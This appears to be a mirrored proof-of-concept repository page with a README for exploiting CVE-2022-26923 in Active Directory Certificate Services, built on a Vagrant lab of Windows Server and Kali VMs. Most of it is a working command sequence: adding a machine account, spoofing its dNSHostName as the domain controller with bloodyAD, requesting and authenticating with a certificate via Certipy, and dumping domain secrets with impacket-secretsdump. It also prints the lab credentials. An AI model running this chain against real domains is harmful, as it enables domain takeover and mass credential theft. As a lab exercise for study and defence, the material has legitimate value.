来源

关联漏洞

描述

Exploitation for CVE-2022-26923

介绍

# Exploiting CVE-2022-26923: Certificate Authority Privilege Escalation

## Overview

CVE-2022-26923 is a vulnerability in Active Directory Certificate Services (AD CS) that allows an attacker to escalate privileges by misusing certificate-based authentication. This guide outlines the steps to exploit this vulnerability using Impacket and Certipy.

---

## Credentials Table

| Virtual Machine    | Username     | Password            |
|--------------------|-------------|----------------------|
| Windows Server    | Administrator | !@windowsadmintest101 |
| Windows Server    | testuser      | $Vulnerable139       |
| Kali-Linux VM     | vagrant       | vagrant              |

---

## Step 1: Clone the Repository and Set Up Virtual Machines

First, clone the repository containing the necessary files:

```bash
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng
```

### Set Up Virtual Machines

The repository contains two folders, each with a `Vagrantfile` for provisioning virtual machines. You must install **Vagrant** on your host machine before proceeding.

#### **Install Vagrant**

##### **For Windows**
Download and install Vagrant from [here](https://www.vagrantup.com/downloads).
Or install using PowerShell:
```powershell
choco install vagrant
```

##### **For Linux**
```bash
sudo apt update && sudo apt install vagrant -y
```

#### **Windows Server 2022 VM**

Navigate to the `WindowsServer2022` directory:

```bash
cd WindowsServer2022
vagrant up
```

This will download and set up the Windows Server 2022 VM in VirtualBox.

#### **Kali Linux VM**

Navigate to the `Kali-LinuxVM` directory:

```bash
cd Kali-LinuxVM
vagrant up
```

---

## Step 2: Configure the Virtual Network

Since the exploit requires a NAT network, configure VirtualBox as follows:

### **On Windows**

Before running the command below, ensure `VBoxManage` is added to your environment variables. If not, execute the command using its full path:

#### **Adding NAT Network**

```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```

If `VBoxManage` is not recognized, use:

```bash
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```

### **On Linux**

```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```
Make sure to check both VMs in VirtualBox and ensure they are assigned to the network adapter NatNetwork - NatNet1.

You can create a NAT network with a different name, but it must be in the IP range 10.0.2.0/24.
---

## Step 3: Modify Hosts File

Before proceeding, ensure both the **Windows Server 2022** and **Kali Linux VM** are turned on.

Access the Kali Linux VM to start the attack.

Update your `/etc/hosts` file to map the domain controller's IP:

```bash
sudo nano /etc/hosts
```

Add the following entry:

```
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
```

Save and exit.

---

## Step 4: Set Up the Environment

Navigate to the `CVE-26923` directory and activate the Python virtual environment:

```bash
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate
```

---

## Step 5: Add a Computer to the Domain

Using Impacket's `addcomputer` utility:

```bash
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'
```

---

## Step 6: Assign PCTEST1 to the Domain Controller

### **Method 1: Using SSH** (if OpenSSH is installed on the target server)

```bash
ssh testuser@10.0.2.121
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
```

### **Method 2: Without SSH** (using Impacket & BloodyAD)

Check domain computers:

```bash
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
```

Navigate to the `bloodyAD` directory and use `bloodyAD.py` to add `PCTEST1` to the domain:

```bash
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'
```

Verify that `PCTEST1` has been assigned to the domain:

```bash
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121
```

---

## Step 7: Exploitation Process

### **Finding Vulnerable Certificates**
Use Certipy to find vulnerable certificates:

```bash
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'
```

### **Requesting a Certificate**
Request a machine certificate using Certipy:

```bash
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA
```

### **Authenticating with the Certificate**
Authenticate using the obtained certificate:

```bash
certipy auth -pfx server2022.pfx
```

---

## Step 8: Extracting NTLM Hashes

After running the `certipy auth` command, two hashes will be displayed. The right-side hash will be used for NTLM authentication.

Example hash output:

```
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7
```

Use the extracted NTLM hash for dumping credentials:

```bash
impacket-secretsdump 'server2022$@pchau.domain.local' -hashes :69079fd4946af567d682d61e121f29e7
```

---

This completes the full attack chain for exploiting CVE-2022-26923.

文件快照

 [4.0K]  /data/pocs/04a9b48ffb1dfc0f1b55b18d1c9e3f103b816bb9
├── [4.0K]  Kali-LinuxVM
│   └── [ 266]  Vagrantfile
├── [5.4K]  README.md
└── [4.0K]  WindowsServer2022
    └── [ 277]  Vagrantfile

2 directories, 3 files

备注